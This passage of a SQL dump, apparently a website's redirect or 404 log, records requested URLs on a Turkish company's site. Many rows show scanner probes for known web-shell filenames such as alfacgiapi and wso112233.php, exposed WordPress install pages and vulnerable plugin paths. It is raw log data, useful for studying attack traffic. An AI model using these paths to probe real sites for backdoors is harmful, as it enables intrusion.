00:00:00',301),(33957,'http://3s-technologies.com.tr/en/wp-content/plugins/ninja-forms',NULL,'www.google.com','',20,0,'2024-01-19 05:00:37','0000-00-00 00:00:00',301),(33958,'http://3s-technologies.com.tr/en/wp-content/mu-plugins',NULL,'www.google.com','',21,0,'2024-01-19 05:00:42','0000-00-00 00:00:00',301),(33959,'http://3s-technologies.com.tr/en/wp-includes/text/diff/renderer',NULL,'www.google.com','',61,0,'2024-01-19 05:00:47','0000-00-00 00:00:00',301),(33960,'http://3s-technologies.com.tr/en/wp-includes/blocks',NULL,'www.google.com','',50,0,'2024-01-19 05:00:52','0000-00-00 00:00:00',301),(33961,'http://3s-technologies.com.tr/en/wp-includes/certificates',NULL,'www.google.com','',80,0,'2024-01-19 05:00:57','0000-00-00 00:00:00',301),(33962,'http://3s-technologies.com.tr/en/wp-includes/customize',NULL,'www.google.com','',43,0,'2024-01-19 05:01:02','0000-00-00 00:00:00',301),(33963,'http://3s-technologies.com.tr/en/wp-includes/fonts',NULL,'www.google.com','',59,0,'2024-01-19 05:01:07','0000-00-00 00:00:00',301),(33964,'http://3s-technologies.com.tr/en/wp-includes/images',NULL,'www.google.com','',78,0,'2024-01-19 05:01:12','0000-00-00 00:00:00',301),(33965,'http://3s-technologies.com.tr/en/.well-knownold',NULL,'www.google.com','',20,0,'2024-01-19 05:01:27','0000-00-00 00:00:00',301),(33966,'http://3s-technologies.com.tr/en/cgi-bin',NULL,'www.google.com','',27,0,'2024-01-19 05:01:42','0000-00-00 00:00:00',301),(33967,'http://3s-technologies.com.tr/en/uploads',NULL,'www.google.com','',48,0,'2024-01-19 05:02:08','0000-00-00 00:00:00',301),(33968,'http://3s-technologies.com.tr/en/upload',NULL,'www.google.com','',33,0,'2024-01-19 05:02:13','0000-00-00 00:00:00',301),(33969,'http://3s-technologies.com.tr/en/admin/uploads',NULL,'www.google.com','',40,0,'2024-01-19 05:02:18','0000-00-00 00:00:00',301),(33970,'http://3s-technologies.com.tr/en/assets',NULL,'www.google.com','',69,0,'2024-01-19 05:02:38','0000-00-00 00:00:00',301),(33971,'http://3s-technologies.com.tr/en/vendor/phpunit/phpunit/src/util/php',NULL,'www.google.com','',16,0,'2024-01-19 05:02:44','0000-00-00 00:00:00',301),(33972,'http://3s-technologies.com.tr/en/upload/image',NULL,'www.google.com','',16,0,'2024-01-19 05:02:48','0000-00-00 00:00:00',301),(33973,'http://3s-technologies.com.tr/en/assets/images',NULL,'www.google.com','',86,0,'2024-01-19 05:02:53','0000-00-00 00:00:00',301),(33974,'http://3s-technologies.com.tr/en/public',NULL,'www.google.com','',16,0,'2024-01-19 05:02:58','0000-00-00 00:00:00',301),(33975,'http://3s-technologies.com.tr/en/vendor',NULL,'www.google.com','',24,0,'2024-01-19 05:03:03','0000-00-00 00:00:00',301),(33976,'http://3s-technologies.com.tr/en/local',NULL,'www.google.com','',16,0,'2024-01-19 05:03:08','0000-00-00 00:00:00',301),(33977,'http://3s-technologies.com.tr/en/system',NULL,'www.google.com','',16,0,'2024-01-19 05:03:22','0000-00-00 00:00:00',301),(33978,'http://3s-technologies.com.tr/en/template',NULL,'www.google.com','',17,0,'2024-01-19 05:03:28','0000-00-00 00:00:00',301),(33979,'http://3s-technologies.com.tr/en/files',NULL,'www.google.com','',55,0,'2024-01-19 05:03:38','0000-00-00 00:00:00',301),(33980,'http://3s-technologies.com.tr/en/admin/editor',NULL,'www.google.com','',16,0,'2024-01-19 05:03:43','0000-00-00 00:00:00',301),(33981,'http://3s-technologies.com.tr/en/include',NULL,'www.google.com','',16,0,'2024-01-19 05:03:48','0000-00-00 00:00:00',301),(33982,'http://3s-technologies.com.tr/en/php',NULL,'www.google.com','',21,0,'2024-01-19 05:04:10','0000-00-00 00:00:00',301),(33983,'http://3s-technologies.com.tr/en/wp-includes/assets',NULL,'www.google.com','',37,0,'2024-01-19 05:04:16','0000-00-00 00:00:00',301),(33984,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine',NULL,'www.google.com','',72,0,'2024-01-19 05:04:21','0000-00-00 00:00:00',301),(33985,'http://3s-technologies.com.tr/en/wp-includes/block-patterns',NULL,'www.google.com','',56,0,'2024-01-19 05:04:25','0000-00-00 00:00:00',301),(33986,'http://3s-technologies.com.tr/en/wp-includes/text/diff',NULL,'www.google.com','',28,0,'2024-01-19 05:04:31','0000-00-00 00:00:00',301),(33987,'http://3s-technologies.com.tr/en/wp-includes/block-supports',NULL,'www.google.com','',82,0,'2024-01-19 05:04:36','0000-00-00 00:00:00',301),(33988,'http://3s-technologies.com.tr/en/wp-includes/simplepie/cache',NULL,'www.google.com','',15,0,'2024-01-19 05:04:51','0000-00-00 00:00:00',301),(33989,'http://3s-technologies.com.tr/en/wp-includes/simplepie/content/type',NULL,'www.google.com','',15,0,'2024-01-19 05:04:56','0000-00-00 00:00:00',301),(33990,'http://3s-technologies.com.tr/en/wp-includes/simplepie/content',NULL,'www.google.com','',25,0,'2024-01-19 05:05:06','0000-00-00 00:00:00',301),(33991,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints',NULL,'www.google.com','',28,0,'2024-01-19 05:05:11','0000-00-00 00:00:00',301),(33992,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields',NULL,'www.google.com','',93,0,'2024-01-19 05:05:16','0000-00-00 00:00:00',301),(33993,'http://3s-technologies.com.tr/en/wp-includes/requests/cookie',NULL,'www.google.com','',15,0,'2024-01-19 05:05:21','0000-00-00 00:00:00',301),(33994,'http://3s-technologies.com.tr/en/wp-includes/requests/proxy',NULL,'www.google.com','',15,0,'2024-01-19 05:05:27','0000-00-00 00:00:00',301),(33995,'http://3s-technologies.com.tr/en/wp-includes/requests/response',NULL,'www.google.com','',15,0,'2024-01-19 05:05:32','0000-00-00 00:00:00',301),(33996,'http://3s-technologies.com.tr/en/wp-includes/requests/transport',NULL,'www.google.com','',15,0,'2024-01-19 05:05:37','0000-00-00 00:00:00',301),(33997,'http://3s-technologies.com.tr/en/wp-includes/requests/utility',NULL,'www.google.com','',15,0,'2024-01-19 05:05:43','0000-00-00 00:00:00',301),(33998,'http://3s-technologies.com.tr/en/wp-includes/js/codemirror',NULL,'www.google.com','',31,0,'2024-01-19 05:05:47','0000-00-00 00:00:00',301),(33999,'http://3s-technologies.com.tr/en/wp-includes/requests/exception/http',NULL,'www.google.com','',15,0,'2024-01-19 05:05:53','0000-00-00 00:00:00',301),(34000,'http://3s-technologies.com.tr/en/wp-includes/js/crop',NULL,'www.google.com','',92,0,'2024-01-19 05:05:58','0000-00-00 00:00:00',301),(34001,'http://3s-technologies.com.tr/en/wp-includes/images/crystal',NULL,'www.google.com','',25,0,'2024-01-19 05:06:04','0000-00-00 00:00:00',301),(34002,'http://3s-technologies.com.tr/en/wp-includes/images/media',NULL,'www.google.com','',66,0,'2024-01-19 05:06:08','0000-00-00 00:00:00',301),(34003,'http://3s-technologies.com.tr/en/wp-includes/images/smilies',NULL,'www.google.com','',28,0,'2024-01-19 05:06:14','0000-00-00 00:00:00',301),(34004,'http://3s-technologies.com.tr/en/wp-includes/images/wlw',NULL,'www.google.com','',25,0,'2024-01-19 05:06:19','0000-00-00 00:00:00',301),(34005,'http://3s-technologies.com.tr/en/wp-includes/rest-api/search',NULL,'www.google.com','',28,0,'2024-01-19 05:06:24','0000-00-00 00:00:00',301),(34006,'http://3s-technologies.com.tr/en/wp-includes/requests/exception',NULL,'www.google.com','',14,0,'2024-01-19 05:06:28','0000-00-00 00:00:00',301),(34007,'http://3s-technologies.com.tr/en/wp-includes/requests/auth',NULL,'www.google.com','',25,0,'2024-01-19 05:06:34','0000-00-00 00:00:00',301),(34008,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src',NULL,'www.google.com','',28,0,'2024-01-19 05:06:38','0000-00-00 00:00:00',301),(34009,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/providers',NULL,'www.google.com','',25,0,'2024-01-19 05:06:43','0000-00-00 00:00:00',301),(34010,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine/engine',NULL,'www.google.com','',15,0,'2024-01-19 05:06:48','0000-00-00 00:00:00',301),(34011,'http://3s-technologies.com.tr/en/wp-includes/html-api',NULL,'www.google.com','',28,0,'2024-01-19 05:07:02','0000-00-00 00:00:00',301),(34012,'http://3s-technologies.com.tr/en/wp-includes/js',NULL,'www.google.com','',42,0,'2024-01-19 05:07:22','0000-00-00 00:00:00',301),(34013,'http://3s-technologies.com.tr/en/wp-includes/php-compat',NULL,'www.google.com','',24,0,'2024-01-19 05:07:27','0000-00-00 00:00:00',301),(34014,'http://3s-technologies.com.tr/en/wp-includes/phpmailer',NULL,'www.google.com','',67,0,'2024-01-19 05:07:32','0000-00-00 00:00:00',301),(34015,'http://3s-technologies.com.tr/en/wp-includes/pomo',NULL,'www.google.com','',42,0,'2024-01-19 05:07:37','0000-00-00 00:00:00',301),(34016,'http://3s-technologies.com.tr/en/wp-includes/random_compat',NULL,'www.google.com','',25,0,'2024-01-19 05:07:42','0000-00-00 00:00:00',301),(34017,'http://3s-technologies.com.tr/en/wp-includes/rest-api',NULL,'www.google.com','',86,0,'2024-01-19 05:07:52','0000-00-00 00:00:00',301),(34018,'http://3s-technologies.com.tr/en/wp-includes/sitemaps',NULL,'www.google.com','',43,0,'2024-01-19 05:08:01','0000-00-00 00:00:00',301),(34019,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat',NULL,'www.google.com','',36,0,'2024-01-19 05:08:05','0000-00-00 00:00:00',301),(34020,'http://3s-technologies.com.tr/en/wp-includes/style-engine',NULL,'www.google.com','',38,0,'2024-01-19 05:08:10','0000-00-00 00:00:00',301),(34021,'http://3s-technologies.com.tr/en/wp-includes/theme-compat',NULL,'www.google.com','',106,0,'2024-01-19 05:08:19','0000-00-00 00:00:00',301),(34022,'http://3s-technologies.com.tr/en/wp-includes/widgets',NULL,'www.google.com','',48,0,'2024-01-19 05:08:24','0000-00-00 00:00:00',301),(34023,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ectoplasm',NULL,'www.google.com','',25,0,'2024-01-19 05:08:30','0000-00-00 00:00:00',301),(34024,'http://3s-technologies.com.tr/en/wp-admin/css/colors',NULL,'www.google.com','',64,0,'2024-01-19 05:08:35','0000-00-00 00:00:00',301),(34025,'http://3s-technologies.com.tr/en/admin/images/slider',NULL,'www.google.com','',14,0,'2024-01-19 05:08:40','0000-00-00 00:00:00',301),(34026,'http://3s-technologies.com.tr/en/admin/fckeditor/editor/filemanager',NULL,'www.google.com','',14,0,'2024-01-19 05:08:45','0000-00-00 00:00:00',301),(34027,'http://3s-technologies.com.tr/en/sites/default/files',NULL,'www.google.com','',15,0,'2024-01-19 05:08:51','0000-00-00 00:00:00',301),(34028,'http://3s-technologies.com.tr/en/admin/controller/extension/extension',NULL,'www.google.com','',38,0,'2024-01-19 05:08:56','0000-00-00 00:00:00',301),(34029,'http://3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements',NULL,'www.google.com','',29,0,'2024-01-19 05:09:01','0000-00-00 00:00:00',301),(34030,'http://3s-technologies.com.tr/en/admin/uploads/images',NULL,'www.google.com','',14,0,'2024-01-19 05:09:10','0000-00-00 00:00:00',301),(34031,'http://3s-technologies.com.tr/en/wp-admin/images',NULL,'www.google.com','',42,0,'2024-01-19 05:09:37','0000-00-00 00:00:00',301),(34032,'http://3s-technologies.com.tr/en/wp-admin/maint',NULL,'www.google.com','',47,0,'2024-01-19 05:09:42','0000-00-00 00:00:00',301),(34033,'http://3s-technologies.com.tr/en/wp-admin/meta',NULL,'www.google.com','',26,0,'2024-01-19 05:09:46','0000-00-00 00:00:00',301),(34034,'http://3s-technologies.com.tr/en/wp-admin/network',NULL,'www.google.com','',43,0,'2024-01-19 05:09:52','0000-00-00 00:00:00',301),(34035,'http://3s-technologies.com.tr/en/wp-admin/user',NULL,'www.google.com','',21,0,'2024-01-19 05:09:57','0000-00-00 00:00:00',301),(34036,'http://3s-technologies.com.tr/en/wp-content',NULL,'www.google.com','',45,0,'2024-01-19 05:10:02','0000-00-00 00:00:00',301),(34037,'http://3s-technologies.com.tr/en/wp-content/upgrade',NULL,'www.google.com','',35,0,'2024-01-19 05:10:27','0000-00-00 00:00:00',301),(34038,'http://3s-technologies.com.tr/tr/wp-content/plugins/ai-engine/app/index.js',NULL,'','',3,0,'2024-01-21 09:54:41','0000-00-00 00:00:00',301),(34039,'https://3s-technologies.com.tr/en/contact-us',NULL,'https://3s-technologies.com.tr/contact-us','',1,0,'2024-01-22 16:03:13','0000-00-00 00:00:00',301),(34040,'https://3s-technologies.com.tr/en/contact',NULL,'https://3s-technologies.com.tr/contact','',8,0,'2024-01-22 16:03:14','0000-00-00 00:00:00',301),(34041,'https://3s-technologies.com.tr/en/wzy.php?action=door123',NULL,'www.google.com','',2,0,'2024-01-23 11:28:33','0000-00-00 00:00:00',301),(34042,'http://3s-technologies.com.tr/tr/wp-pano',NULL,'','',1,0,'2024-01-23 20:35:42','0000-00-00 00:00:00',301),(34043,'http://3s-technologies.com.tr/tr/wordpress/wp-class.php',NULL,'','',1,0,'2024-01-29 08:20:41','0000-00-00 00:00:00',301),(34044,'http://3s-technologies.com.tr/tr/site/wp-class.php',NULL,'','',1,0,'2024-01-29 08:20:42','0000-00-00 00:00:00',301),(34045,'http://3s-technologies.com.tr/tr/wp/wp-includes/wp-class.php',NULL,'','',1,0,'2024-01-29 08:20:46','0000-00-00 00:00:00',301),(34046,'http://3s-technologies.com.tr/tr/wordpress/wp-includes/wp-class.php',NULL,'','',1,0,'2024-01-29 08:20:47','0000-00-00 00:00:00',301),(34047,'http://3s-technologies.com.tr/tr/blog/wp-class.php',NULL,'','',1,0,'2024-01-29 08:20:49','0000-00-00 00:00:00',301),(34048,'http://3s-technologies.com.tr/tr/alfa4.php',NULL,'','',1,0,'2024-01-29 08:20:52','0000-00-00 00:00:00',301),(34049,'http://3s-technologies.com.tr/tr/dz.php',NULL,'','',3,0,'2024-01-29 08:20:53','0000-00-00 00:00:00',301),(34050,'http://3s-technologies.com.tr/tr/sells.php',NULL,'','',1,0,'2024-01-29 08:20:56','0000-00-00 00:00:00',301),(34051,'http://3s-technologies.com.tr/tr/wp-content/uploads/f0x.php',NULL,'','',1,0,'2024-01-29 08:21:19','0000-00-00 00:00:00',301),(34052,'http://3s-technologies.com.tr/tr/indo.php',NULL,'','',15,0,'2024-01-29 08:21:37','0000-00-00 00:00:00',301),(34053,'http://3s-technologies.com.tr/tr/wp-2018.php',NULL,'','',2,0,'2024-01-29 08:21:39','0000-00-00 00:00:00',301),(34054,'http://3s-technologies.com.tr/tr/wp-2021.php',NULL,'','',1,0,'2024-01-29 08:21:43','0000-00-00 00:00:00',301),(34055,'http://3s-technologies.com.tr/tr/wp-2022.php',NULL,'','',1,0,'2024-01-29 08:21:45','0000-00-00 00:00:00',301),(34056,'http://3s-technologies.com.tr/tr/wp-2023.php',NULL,'','',1,0,'2024-01-29 08:21:46','0000-00-00 00:00:00',301),(34057,'http://3s-technologies.com.tr/tr/indosec.php',NULL,'','',3,0,'2024-01-29 08:21:54','0000-00-00 00:00:00',301),(34058,'http://3s-technologies.com.tr/tr/alfacgiapi',NULL,'','',5,0,'2024-01-29 08:22:01','0000-00-00 00:00:00',301),(34059,'http://3s-technologies.com.tr/tr/wordpress/alfa_data/alfacgiapi',NULL,'','',4,0,'2024-01-29 08:22:03','0000-00-00 00:00:00',301),(34060,'http://3s-technologies.com.tr/tr/wordpress/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:04','0000-00-00 00:00:00',301),(34061,'http://3s-technologies.com.tr/tr/site/alfa_data/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:06','0000-00-00 00:00:00',301),(34062,'http://3s-technologies.com.tr/tr/site/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:08','0000-00-00 00:00:00',301),(34063,'http://3s-technologies.com.tr/tr/wp-content/alfacgiapi',NULL,'','',3,0,'2024-01-29 08:22:11','0000-00-00 00:00:00',301),(34064,'http://3s-technologies.com.tr/tr/wp-includes/alfa_data/alfacgiapi',NULL,'','',4,0,'2024-01-29 08:22:13','0000-00-00 00:00:00',301),(34065,'http://3s-technologies.com.tr/tr/wp-includes/alfacgiapi',NULL,'','',4,0,'2024-01-29 08:22:15','0000-00-00 00:00:00',301),(34066,'http://3s-technologies.com.tr/tr/wp/wp-includes/alfa_data/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:17','0000-00-00 00:00:00',301),(34067,'http://3s-technologies.com.tr/tr/wp/wp-includes/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:19','0000-00-00 00:00:00',301),(34068,'http://3s-technologies.com.tr/tr/wordpress/wp-includes/alfa_data/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:21','0000-00-00 00:00:00',301),(34069,'http://3s-technologies.com.tr/tr/wordpress/wp-includes/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:22','0000-00-00 00:00:00',301),(34070,'http://3s-technologies.com.tr/tr/blog/alfa_data/alfacgiapi',NULL,'','',4,0,'2024-01-29 08:22:25','0000-00-00 00:00:00',301),(34071,'http://3s-technologies.com.tr/tr/blog/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:26','0000-00-00 00:00:00',301),(34072,'http://3s-technologies.com.tr/tr/admin/controller/extension/alfa_data/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:27','0000-00-00 00:00:00',301),(34073,'http://3s-technologies.com.tr/tr/admin/controller/extension/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:28','0000-00-00 00:00:00',301),(34074,'http://3s-technologies.com.tr/tr/admin/controller/alfa_data/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:29','0000-00-00 00:00:00',301),(34075,'http://3s-technologies.com.tr/tr/admin/controller/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:31','0000-00-00 00:00:00',301),(34076,'http://3s-technologies.com.tr/tr/admin/alfa_data/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:32','0000-00-00 00:00:00',301),(34077,'http://3s-technologies.com.tr/tr/admin/alfacgiapi',NULL,'','',1,0,'2024-01-29 08:22:33','0000-00-00 00:00:00',301),(34078,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/database.php',NULL,'','',1,0,'2024-01-29 08:22:34','0000-00-00 00:00:00',301),(34079,'http://3s-technologies.com.tr/tr/cgi-bin/deathshop.php',NULL,'','',2,0,'2024-01-29 08:22:35','0000-00-00 00:00:00',301),(34080,'http://3s-technologies.com.tr/tr/deathshop.php',NULL,'','',8,0,'2024-01-29 08:22:36','0000-00-00 00:00:00',301),(34081,'http://3s-technologies.com.tr/cgi-bin/mt-xmlrpc.cgi',NULL,'','',1,0,'2024-01-29 08:22:37','0000-00-00 00:00:00',301),(34082,'http://3s-technologies.com.tr/mtos/mt-xmlrpc.cgi',NULL,'','',1,0,'2024-01-29 08:22:43','0000-00-00 00:00:00',301),(34083,'http://3s-technologies.com.tr/cms/mt-xmlrpc.cgi',NULL,'','',1,0,'2024-01-29 08:22:45','0000-00-00 00:00:00',301),(34084,'http://3s-technologies.com.tr/cgi/mt-xmlrpc.cgi',NULL,'','',1,0,'2024-01-29 08:22:48','0000-00-00 00:00:00',301),(34085,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/mar.php',NULL,'','',2,0,'2024-01-29 08:22:55','0000-00-00 00:00:00',301),(34086,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/init.php',NULL,'','',105,0,'2024-01-29 08:23:00','0000-00-00 00:00:00',301),(34087,'http://3s-technologies.com.tr/tr/wp-content/plugins/easy-wp-smtp',NULL,'','',1,0,'2024-01-29 08:23:03','0000-00-00 00:00:00',301),(34088,'http://3s-technologies.com.tr/tr/test/wp-admin/install.php',NULL,'','',1,0,'2024-01-29 08:23:13','0000-00-00 00:00:00',301),(34089,'http://3s-technologies.com.tr/tr/cms/wp-admin/install.php',NULL,'','',1,0,'2024-01-29 08:23:16','0000-00-00 00:00:00',301),(34090,'http://3s-technologies.com.tr/tr/web/wp-admin/install.php',NULL,'','',1,0,'2024-01-29 08:23:18','0000-00-00 00:00:00',301),(34091,'http://3s-technologies.com.tr/tr/web/wp-admin/setup-config.php',NULL,'','',1,0,'2024-01-29 08:23:18','0000-00-00 00:00:00',301),(34092,'http://3s-technologies.com.tr/tr/backup/wp-admin/install.php',NULL,'','',1,0,'2024-01-29 08:23:19','0000-00-00 00:00:00',301),(34093,'http://3s-technologies.com.tr/tr/site/wp-admin/install.php',NULL,'','',1,0,'2024-01-29 08:23:21','0000-00-00 00:00:00',301),(34094,'http://3s-technologies.com.tr/tr/oldsite/wp-admin/setup-config.php',NULL,'','',1,0,'2024-01-29 08:23:23','0000-00-00 00:00:00',301),(34095,'http://3s-technologies.com.tr/tr/paiement/wp-admin/install.php',NULL,'','',1,0,'2024-01-29 08:23:24','0000-00-00 00:00:00',301),(34096,'http://3s-technologies.com.tr/tr/paiement/wp-admin/setup-config.php',NULL,'','',1,0,'2024-01-29 08:23:25','0000-00-00 00:00:00',301),(34097,'http://3s-technologies.com.tr/tr/sandbox/wp-admin/install.php',NULL,'','',1,0,'2024-01-29 08:23:25','0000-00-00 00:00:00',301),(34098,'http://3s-technologies.com.tr/tr/sandbox/wp-admin/setup-config.php',NULL,'','',1,0,'2024-01-29 08:23:26','0000-00-00 00:00:00',301),(34099,'http://3s-technologies.com.tr/tr/wp-content/plugins/augmented-reality/file_manager',NULL,'','',1,0,'2024-01-29 08:23:28','0000-00-00 00:00:00',301),(34100,'http://3s-technologies.com.tr/tr/wp-content/plugins/ubh',NULL,'','',2,0,'2024-01-29 08:23:29','0000-00-00 00:00:00',301),(34101,'http://3s-technologies.com.tr/tr/wp-content/plugins/update',NULL,'','',1,0,'2024-01-29 08:23:32','0000-00-00 00:00:00',301),(34102,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty',NULL,'','',7,0,'2024-01-29 08:23:33','0000-00-00 00:00:00',301),(34103,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag',NULL,'','',4,0,'2024-01-29 08:23:33','0000-00-00 00:00:00',301),(34104,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme',NULL,'','',6,0,'2024-01-29 08:23:35','0000-00-00 00:00:00',301),(34105,'http://3s-technologies.com.tr/tr/wp-content/plugins/apikey',NULL,'','',1,0,'2024-01-29 08:23:36','0000-00-00 00:00:00',301),(34106,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/php',NULL,'','',1,0,'2024-01-29 08:23:37','0000-00-00 00:00:00',301),(34107,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager',NULL,'','',1,0,'2024-01-29 08:23:41','0000-00-00 00:00:00',301),(34108,'http://3s-technologies.com.tr/tr/admin/controller/extension',NULL,'','',4,0,'2024-01-29 08:23:44','0000-00-00 00:00:00',301),(34109,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins',NULL,'','',10,0,'2024-01-29 08:23:45','0000-00-00 00:00:00',301),(34110,'http://3s-technologies.com.tr/tr/wp-content/themes/gaukingo',NULL,'','',1,0,'2024-01-29 08:23:46','0000-00-00 00:00:00',301),(34111,'http://3s-technologies.com.tr/tr/wp-includes/css',NULL,'','',105,0,'2024-01-29 08:23:47','0000-00-00 00:00:00',301),(34112,'http://3s-technologies.com.tr/en/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'','',4,0,'2024-01-29 22:22:56','0000-00-00 00:00:00',301),(34113,'http://3s-technologies.com.tr/tr/wp-content/plugins/ai-engine/readme.txt',NULL,'','',1,0,'2024-01-31 09:50:16','0000-00-00 00:00:00',301),(34114,'https://3s-technologies.com.tr/tr/wp-content/plugins/ai-engine/readme.txt',NULL,'','',1,0,'2024-01-31 09:50:16','0000-00-00 00:00:00',301),(34115,'http://3s-technologies.com.tr/tr/wp-content/plugins/essential-blocks/assets/css/react-select.min.css',NULL,'','',2,0,'2024-01-31 13:40:26','0000-00-00 00:00:00',301),(34116,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-gdpr-compliance/assets/js/front.min.js.license.txt',NULL,'','',2,0,'2024-02-01 20:01:38','0000-00-00 00:00:00',301),(34117,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/kopyas',NULL,'','',2,0,'2024-02-01 23:32:01','0000-00-00 00:00:00',301),(34118,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/kopyas',NULL,'','',1,0,'2024-02-01 23:32:05','0000-00-00 00:00:00',301),(34119,'http://3s-technologies.com.tr/tr/wp-content/plugins/backup-backup/includes/d',NULL,'','',1,0,'2024-02-02 14:28:56','0000-00-00 00:00:00',301),(34120,'https://3s-technologies.com.tr/tr/wp-content/plugins/backup-backup/includes/b',NULL,'','',1,0,'2024-02-02 14:28:57','0000-00-00 00:00:00',301),(34121,'https://www.3s-technologies.com.tr/tr/enhancecp',NULL,'','',1,0,'2024-02-03 21:40:02','0000-00-00 00:00:00',301),(34122,'http://3s-technologies.com.tr/tr/cjfuns .php',NULL,'http://3s-technologies.com.tr/cjfuns%20.php','',3,0,'2024-02-06 02:06:30','0000-00-00 00:00:00',301),(34123,'http://3s-technologies.com.tr/tr/wp-admin/network/amaxx.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/amaxx.php','',4,0,'2024-02-06 02:06:32','0000-00-00 00:00:00',301),(34124,'http://3s-technologies.com.tr/tr/wp-admin/user/about.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/about.php','',154,0,'2024-02-06 02:06:32','0000-00-00 00:00:00',301),(34125,'http://3s-technologies.com.tr/tr/wp-content/upgrade/edit.php',NULL,'http://3s-technologies.com.tr/wp-content/upgrade/edit.php','',3,0,'2024-02-06 02:06:35','0000-00-00 00:00:00',301),(34126,'http://3s-technologies.com.tr/tr/ioxi02.php',NULL,'http://3s-technologies.com.tr/ioxi02.php','',9,0,'2024-02-06 02:06:36','0000-00-00 00:00:00',301),(34127,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/nxd.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/core-plugin/nxd.php','',4,0,'2024-02-06 02:06:37','0000-00-00 00:00:00',301),(34128,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/.nxd.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/core-plugin/.nxd.php','',3,0,'2024-02-06 02:06:39','0000-00-00 00:00:00',301),(34129,'http://3s-technologies.com.tr/tr/_well-known/amaxx.php',NULL,'http://3s-technologies.com.tr/_well-known/amaxx.php','',4,0,'2024-02-06 02:06:42','0000-00-00 00:00:00',301),(34130,'http://3s-technologies.com.tr/tr/wp-includes/amaxx.php',NULL,'http://3s-technologies.com.tr/Wp-includes/amaxx.php','',3,0,'2024-02-06 02:06:44','0000-00-00 00:00:00',301),(34131,'http://3s-technologies.com.tr/tr/menu.php',NULL,'http://3s-technologies.com.tr/menu.php','',168,0,'2024-02-06 02:06:47','0000-00-00 00:00:00',301),(34132,'http://3s-technologies.com.tr/tr/_wel-known/pki-validation/883d551d-7523-4judgzvrmfdwruuwy3tojatsenwjn54lkcnkbprzduhzi5vsephfuckjnxrl2gjknrsqtcoruredagrwsqvvcjzbryftlrnydmt1a1bozv',NULL,'http://3s-technologies.com.tr/_wel-known/pki-validation/883d551d-7523-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV','',3,0,'2024-02-06 02:06:48','0000-00-00 00:00:00',301),(34133,'http://3s-technologies.com.tr/tr/wp-includes/customize/amaxx.php',NULL,'http://3s-technologies.com.tr/wp-includes/customize/amaxx.php','',3,0,'2024-02-06 02:06:49','0000-00-00 00:00:00',301),(34134,'http://3s-technologies.com.tr/tr/cjfuns.php',NULL,'http://3s-technologies.com.tr/cjfuns.php','',40,0,'2024-02-06 02:06:50','0000-00-00 00:00:00',301),(34135,'http://3s-technologies.com.tr/tr/class.api.php',NULL,'http://3s-technologies.com.tr/class.api.php','',61,0,'2024-02-06 02:06:56','0000-00-00 00:00:00',301),(34136,'http://3s-technologies.com.tr/tr/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/backup-backup/includes/backup-heart.php','',6,0,'2024-02-06 02:06:56','0000-00-00 00:00:00',301),(34137,'http://3s-technologies.com.tr/tr/wp-content/plugins/backup-backup/includes',NULL,'http://3s-technologies.com.tr/wp-content/plugins/backup-backup/includes/','',3,0,'2024-02-06 02:06:57','0000-00-00 00:00:00',301),(34138,'http://3s-technologies.com.tr/tr/wp-content/plugins/core/include.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/core/include.php','',22,0,'2024-02-06 02:07:00','0000-00-00 00:00:00',301),(34139,'http://3s-technologies.com.tr/tr/wp-admin/images/admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/images/admin.php','',100,0,'2024-02-06 02:07:03','0000-00-00 00:00:00',301),(34140,'http://3s-technologies.com.tr/tr/.well-known/wso112233.php',NULL,'http://3s-technologies.com.tr/.well-known/wso112233.php','',17,0,'2024-02-06 02:07:05','0000-00-00 00:00:00',301),(34141,'http://3s-technologies.com.tr/tr/wp-includes/ixr/themes.php',NULL,'http://3s-technologies.com.tr/wp-includes/IXR/themes.php','',12,0,'2024-02-06 02:07:17','0000-00-00 00:00:00',301),(34142,'http://3s-technologies.com.tr/tr/wp-header.php',NULL,'http://3s-technologies.com.tr/wp-header.php','',104,0,'2024-02-06 02:07:18','0000-00-00 